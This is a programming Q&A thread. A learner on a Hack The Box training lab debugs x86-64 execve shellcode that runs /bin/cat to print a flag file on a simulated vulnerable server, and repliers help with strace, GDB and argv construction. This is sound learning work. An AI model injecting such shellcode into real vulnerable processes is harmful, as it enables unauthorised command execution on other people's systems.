How to use execve in x86-64 assembly
I'm going through the 'Intro to Assembly Language' module on Hack The Box Academy and I'm currently having trouble with the 'Shellcoding Tools' section. The prompt is: 'The above server simulates an exploitable server you can execute shellcodes on. Use one of the tools to generate a shellcode that prints the content of '/flag.txt', then connect to the server with "nc SERVER_IP PORT" to send the shellcode.' I'm trying to create assembly shellcode to do this using /bin/cat via execve. I'm using Linux and here is my code:
global _start

section .text
_start:
        ; execve("/usr/bin/cat", ["/usr/bin/cat", "/flag.txt"], NULL)

        xor rax, rax
        push rax
        mov rbx, "t"; t
        push rbx
        mov rbx, "/flag.tx"; /flag.tx
        push rbx
        mov rbx, rsp
        push rax
        xor rbx, rbx
        mov rbx, "/cat"; /cat
        push rbx
        mov rbx, "/usr/bin"; /usr/bin
        push rbx
        mov rsi, rsp
        xor rbx, rbx
        mov rbx, "/cat"; /cat
        push rbx
        mov rbx, "/usr/bin"; /usr/bin
        push rbx
        mov rsi, rsp

        mov rax, 59
        mov rdx, 0
        syscall

I'm obviously new to assembly, hence the HTB course I'm doing, so I know there's some concept I'm missing here. Any help appreciated.
EDIT
I revised my code a little. Still doesn't work but I think it's progress?
_start:
        xor rax, rax
        push rax

        mov rsi, "flag.txt"
        push rsi
        mov rsi, rsp

        push rax

        mov rdi, "/bin/cat"
        push rdi
        mov rdi, rsp

        mov rdx, rax

        mov rax, 59
        syscall

When I use strace, I get
execve("/bin/cat", [0x7478742e67616c66], NULL) = -1 EFAULT (Bad address)

So it looks like the flag.txt string isn't being passed right I think? I think this might be because I'm not null terminating right maybe but I'm not sure.

For starters, you do mov rbx, rsp but then xor rbx, rbx and have mov rsi, rsp twice. Also you don't seem to be creating the argument array at all.

@Jester Thanks good points. I edited my code a little bit.

Use strace ./a.out to trace system calls and see what args you actually passed to execve.  Then use a debugger to look at memory contents and see what your code actually does.  e.g. GDB's x command can dump a range of memory.

If you are new to assembly, then you should restrict yourself to regular, run of the mill, garden variety coding, like do a quick-sort, compute a fibonacci sequence, etc.; after about ten years of coding that kind of stuff, you might want to try your luck with advanced stuff like doing a boot loader for a bare-metal machine, etc.; and then after about another ten years of doing that advanced stuff, you might want to try your luck with m4d h4kz.

@MikeNakis yeah uh the goal is definitely not to become a 40 year old assembly programmer. I'm only trying to learn enough for reversing/exploitation purposes.

@MikeNakis: It doesn't take 10 years of experience to figure out how to write basic shellcode like this that isn't obfuscated at all (and doesn't even avoid 0 bytes in the machine code with mov rbx, 't').
You just need some experience with a debugger to catch mistakes and check what you're getting, and ability to read the manual.  Understanding of the data-structures you need to pass to the kernel can come from C.

thanks to the HTB Discord, very helpful people. I was making NULL termination mistakes as well as not properly creating the argv array in memory. This can probably be optimized and cleaned up but thats a task for another day.
_start:
        xor rax, rax
        push rax

        mov rsi, "flag.txt"
        push rsi
        mov rsi, rsp

        push rax

        mov rbx, "/bin/cat"
        push rbx
        mov rbx, rsp

        push rax
        push rsi
        push rbx
        mov rsi, rsp

        push rax

        mov rdi, "/bin/cat"
        push rdi
        mov rdi, rsp

        mov rdx, rax

        mov rax, 59
        syscall

